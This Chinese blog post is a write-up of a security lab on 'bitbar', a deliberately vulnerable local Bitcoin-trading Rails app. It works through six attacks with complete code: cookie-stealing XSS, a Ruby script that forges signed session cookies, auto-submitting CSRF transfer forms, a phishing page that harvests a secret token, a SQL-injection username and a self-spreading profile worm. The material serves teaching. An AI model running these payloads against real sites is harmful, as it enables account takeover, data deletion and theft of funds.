banner
raye~

Raye's Journey

且趁闲身未老,尽放我、些子疏狂。
medium
tg_channel
telegram
twitter
douban
github
email
nintendo switch
playstation
steam_profiles
zhihu

bitbar渗透实验

lukas-NLSXFjl_nhc-unsplash

本文首发于 https://sec-in.com/article/441

给的是一个比特币交易的网站,本地搭建环境之后开始按照文章中的要求来完成 6 次 attack

网站源码和代码都放在这个仓库了 https://github.com/xinyongpeng/bitbar

根据路由

  get 'profile' => 'user#view_profile'

定位到函数

  def view_profile
    @username = params[:username]
    @user = User.find_by_username(@username)
    if not @user
      if @username and @username != ""
        @error = "User #{@username} not found"
      elsif logged_in?
        @user = @logged_in_user
      end
    end
    
    render :profile
  end

可以看到,输入的 username 被直接给打印出来,那么自然就存在 XSS 漏洞了。

payload

<script type="text/javascript">(new Image()).src="http://localhost:3000/steal_cookie?cookie="+document.cookie</script>

或者使用 xmlhttprequest 发送

<script type="text/javascript">var x = new XMLHttpRequest();x.open("GET", "http://localhost:3000/steal_cookie?cookie="+(document.cookie));x.send()</script>

1588517915811.png

Attack 2: Session hijacking with Cookies#

参考这篇文章
1.png

上图说明了原始的 Session 对象 Session Data 是如何最终生成 Cookie 的

原来的加密过程:

  1. 序列化
  2. 填充,aes-cbc 加密,结果用 base64 编码
  3. hmac-sha1 签名
  4. 将加密的数据和签名通过 -- 连接

但是意外地发现,bitbar 的 cookie 并没有 aes 加密,可以通过

  1. base64 解码
  2. 反序列化

得到原始信息,那么这么一来,就只需要绕过验签这一个障碍了

config/initializers/secret_token.rb

# Be sure to restart your server when you modify this file.

# Your secret key is used for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!

# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
# You can use `rake secret` to generate a secure secret key.

# Make sure your secret_key_base is kept private
# if you're sharing your code publicly.
Bitbar::Application.config.secret_token = '0a5bfbbb62856b9781baa6160ecfd00b359d3ee3752384c2f47ceb45eada62f24ee1cbb6e7b0ae3095f70b0a302a2d2ba9aadf7bc686a49c8bac27464f9acb08'

这就是 hmac-sha1 的加解密密钥

ok,到此为止我们就能伪造数据了

  1. attacke 用户登陆,获取到当前的 cookie
  2. 修改 cookie 值

这里需要用到 mechanize 这个包,安装

gem install mechanize

模拟登陆实现

agent = Mechanize.new #实例化对象
url = "http://localhost:3000/login"

page = agent.get(url) # 获得网页

form = page.forms.first # 第一个表单
form['username'] = form['password'] = 'attacker' # 填写表单,用户名和密码都是attacker
agent.submit form # 提交表单

这就相当于登陆了,然后我们获得 cookie 信息

cookie = agent.cookie_jar.jar['localhost']['/'][SESSION].to_s.sub("#{SESSION}=", '')
cookie_value, cookie_signature = cookie.split('--')
raw_session = Base64.decode64(cookie_value)
session = Marshal.load(raw_session)

session 如下:

{"session_id"=>"66ef9a22ca26e27ea4d3018b12c07999", "token"=>"q2VXDRnMskkf-69Gu2PiTg", "logged_in_id"=>4}

很明显, 我们只需要修改 logged_in_id 为 1 即可

session['logged_in_id'] = 1
cookie_value = Base64.encode64(Marshal.dump(session)).split.join # get rid of newlines
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, RAILS_SECRET, cookie_value)
cookie_full = "#{SESSION}=#{cookie_value}--#{cookie_signature}"

puts "document.cookie='#{cookie_full}';"

这时候得到的 session

document.cookie='_bitbar_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJTY2ZWY5YTIyY2EyNmUyN2VhNGQzMDE4YjEyYzA3OTk5BjsAVEkiCnRva2VuBjsARkkiG3EyVlhEUm5Nc2trZi02OUd1MlBpVGcGOwBGSSIRbG9nZ2VkX2luX2lkBjsARmkG--935e2e8f9f3d190f2ffccdf9cafd9e4480319054';

然后再发送数据,比如访问 http://localhost:3000/profile

url = URI('http://localhost:3000/profile')

http = Net::HTTP.new(url.host, url.port)

header = {'Cookie':cookie_full}
response = http.get(url,header)
puts response.body

此时我们就能看到,
1588571397765.png

浏览器已经认为我们是 user1

完整代码

require 'mechanize'
require 'net/http'
SESSION = '_bitbar_session'
RAILS_SECRET = '0a5bfbbb62856b9781baa6160ecfd00b359d3ee3752384c2f47ceb45eada62f24ee1cbb6e7b0ae3095f70b0a302a2d2ba9aadf7bc686a49c8bac27464f9acb08'

agent = Mechanize.new
url = "http://localhost:3000/login"

page = agent.get(url)

form = page.forms.first
form['username'] = form['password'] = 'attacker'
agent.submit form

cookie = agent.cookie_jar.jar['localhost']['/'][SESSION].to_s.sub("#{SESSION}=", '')
cookie_value, cookie_signature = cookie.split('--')
raw_session = Base64.decode64(cookie_value)
session = Marshal.load(raw_session)

puts session
session['logged_in_id'] = 1
cookie_value = Base64.encode64(Marshal.dump(session)).split.join # get rid of newlines
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, RAILS_SECRET, cookie_value)
cookie_full = "#{SESSION}=#{cookie_value}--#{cookie_signature}"

url = URI('http://localhost:3000/profile')

http = Net::HTTP.new(url.host, url.port)

header = {'Cookie':cookie_full}
response = http.get(url,header)
puts response.body

Attack 3: Cross-site Request Forgery#

分析,登陆 user1, 向 attacker 转帐,抓到的数据包如下

1588573100136.png

可见,只需要构造一个表单自动提交即可

b.html 内容如下

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
    
    <form action="http://localhost:3000/post_transfer" method="post" enctype="application/x-www-form-urlencoded" id="pay">
        < input type="hidden" name="destination_username" value="attacker">
        < input type="hidden" name="quantity" value=10>
    </form>

    <script type="text/javascript">
        function validate(){
            document.getElementById("pay").submit();
        }
        window.load = validate();
        setTimeout(function(){window.location = "http://baidu.com";}, 0.1);
        </script>
</body>
</html>

表单的字段都是隐藏的,并且值都是给定的,之后通过

document.getElementById("pay").submit();

实现自动提交

最后

setTimeout(function(){window.location = "http://baidu.com";}, 0.1);

0.1s 后跳转到百度首页

也可以使用 xmlhttprequest ,一样的思路

<html>
  <body>
    <script>
      var request = new XMLHttpRequest();
      request.open("POST", "http://localhost:3000/post_transfer");
      request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
      request.withCredentials = true;
      try {
        request.send("quantity=10&destination_username=attacker");
      } catch (err) {
        //
      } finally {
        window.location = "http://baidu.com/";
      }
    </script>
  </body>
</html>

Attack 4: Cross-site request forgery with user assistance#

由于 http://localhost:3000/super_secure_transfer 转账的时候,表单带上了一个随机 token,所以没办法通过 CSRF 来转帐,只能通过钓鱼的办法,欺骗用户输入自己的 Super Secret Token, 这样我们就能绕过服务器的校验了

bp2.html 可以使用上一个的代码

bp.html
<html>
  <head>
    <title>23333</title>
  </head>
  <body>
    <style type="text/css">
      iframe {
      width: 100%;
      height: 100%;
      border: none;
      }
    </style>
    <script></script>
    <iframe src="bp2.html" scrolling="no"></iframe>
  </body>
</html>
bp2.html
<p>请输入 super_secure_post_transfer 页面下的 Super Secret Token 来证明你不是机器人</p>

< input id="token" type="text" placeholder="Captcha">
<button onClick="gotEm()">Confirm</button>

<script>
function gotEm() {
  var token = document.getElementById("token").value;
  var request = new XMLHttpRequest();
  request.open("POST", "http://localhost:3000/super_secure_post_transfer", false);
  request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
  request.withCredentials = true;
  try {
    request.send("quantity=10&destination_username=attacker&tokeninput=" + token);
  } catch (err) {
    // Do nothing on inevitable XSS error
  } finally {
    window.top.location = "http://baidu.com";
  }
}
</script>

Attack 5: Little Bobby Tables (aka SQL Injection)#

删除用户的逻辑如下

  def post_delete_user
    if not logged_in?
      render "main/must_login"
      return
    end

    @username = @logged_in_user.username
    User.destroy_all("username = '#{@username}'")

    reset_session
    @logged_in_user = nil
    render "user/delete_user_success"
  end

可以看到输入的用户名没有经过任何的过滤直接拼接到了 SQL 语句中,我们看到后台执行的 SQL 语句
1589676140899.png

如果我们的用户名中含有 user3 即可将 user3 删除

那么如果我们注册用户

user3' or username GLOB 'user3?*

拼接出来的 SQL 语句必然是

delete from users where username = user3 or username GLOB 'user3?*'

登陆

1589676748910.png

删除

1589676771789.png

此时可以看到后台执行的 SQL 语句

1589676794562.png

Attack 6: Profile Worm#

问题出在渲染用户的 profile 上面

profile.html.erb 中,渲染用户的 profile 代码如下

    <% if @user.profile and @user.profile != "" %>
        <div id="profile"><%= sanitize_profile(@user.profile) %></div>
    <% end %>

调用了函数 sanitize_profile

  def sanitize_profile(profile)
    return sanitize(profile, tags: %w(a br b h1 h2 h3 h4 i img li ol p strong table tr td th u ul em span), attributes: %w(id class href colspan rowspan src align valign))
  end

其中 santitize 函数,通过 tagsattributes 可以指定允许的标签和属性白名单。

然而属性中出现了 href, 这意味着我们可以使用 JavaScript 伪协议来 XSS

参考: https://ruby-china.org/topics/28760

比如

<strong id="bitbar_count" class="javascript:alert(1)"></strong>

更新自己的 profile 时,查看自己的 profile,即可弹窗

1589677835296.png

如果有用户浏览当前的 profile,那么将会发生两个操作

  1. 转账操作
  2. 更新用户的 profile

转账操作的代码如下

var request = new XMLHttpRequest();
request.open("POST", "http://localhost:3000/post_transfer");
request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
request.withCredentials = true;
try {
    request.send("quantity=1&destination_username=attacker");
} catch (err) {
//
} finally {
    //xxxx 带执行的操作
}

转帐完成之后,我们需要立即更新当前浏览用户的 profile

设置 profile 的数据包如下

1589678078348.png

只需要向路由 /set_profile 发送请求即可

request = new XMLHttpRequest();
request.open("POST", "http://localhost:3000/set_profile", true);
request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
request.withCredentials = true;
request.send("new_profile=".concat(escape(document.getElementById('hax-wrap').outerHTML)));

遇到的问题:

  1. 发送的数据含有 html 转移后的 & 符号。如图

clipboard.png
这里我采用的是 String.fromCharCode() 来将其做一次转换

  1. 字符串拼接只能用 concat 而不能用 + ,因为 + 号在 html 中是空格的意思

最后的代码

<span id="wrap">
<span id="bitbar_count" class="eval(document['getElementById']('pxy')['innerHTML'])"></span>
<span id="pxy">
document.getElementById('pxy').style.display = "none";
setTimeout(function(){

    var request = new XMLHttpRequest();
    request.open("POST", "http://localhost:3000/post_transfer");
    request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    request.withCredentials = true;
    try {
        request.send("quantity=1".concat(String.fromCharCode(38)).concat("destination_username=attacker"));
    } catch (err) {
    //
    } finally {
        request = new XMLHttpRequest();
        request.open("POST", "http://localhost:3000/set_profile", true);
        request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        request.withCredentials = true;
        request.send("new_profile=".concat(escape(document.getElementById('wrap').outerHTML)));
    }

}, 0);
10;
</span>
<p>233333</p>
</span>

ps: 也可以用 js 动态创建 form 表单的方式,但是这样页面是会跳转的,无法满足

在转账和 profile 的赋值过程中,浏览器的地址栏需要始终停留在http://localhost:3000/profile?username=x ,其中 x 是 profile 被浏览的用户名。

附上 js 动态创建 form 表单的代码

<span id="wrap">
<strong id="bitbar_count" class="eval((document['getElementById']('pxy').innerHTML))"></strong>
<span id="pxy">
document.getElementById('pxy').style.display = "none";
function makeForm(){
    var form = document.createElement("form");
    form.id = "pay";
    
    document.body.appendChild(form);
    var input = document.createElement("input");
    input.type = "text";

    input.name =  "destination_username";
    input.value = "attacker";
    input.type = 'hidden';

    form.appendChild(input);
    var input2 = document.createElement("input");
    input2.type = "hidden";
    input2.name = "quantity";
    input2.value = 10
    
    form.appendChild(input2);
    form.action = "http://localhost:3000/post_transfer";
    form.method = "POST";
    form.enctype = "application/x-www-form-urlencode";
    form.submit();
}
makeForm();
request = new XMLHttpRequest();
request.open("POST", "http://localhost:3000/set_profile", true);
request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
request.withCredentials = true;
request.send("new_profile=".concat(escape(document.getElementById('wrap').outerHTML)));
</span>
</span>
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.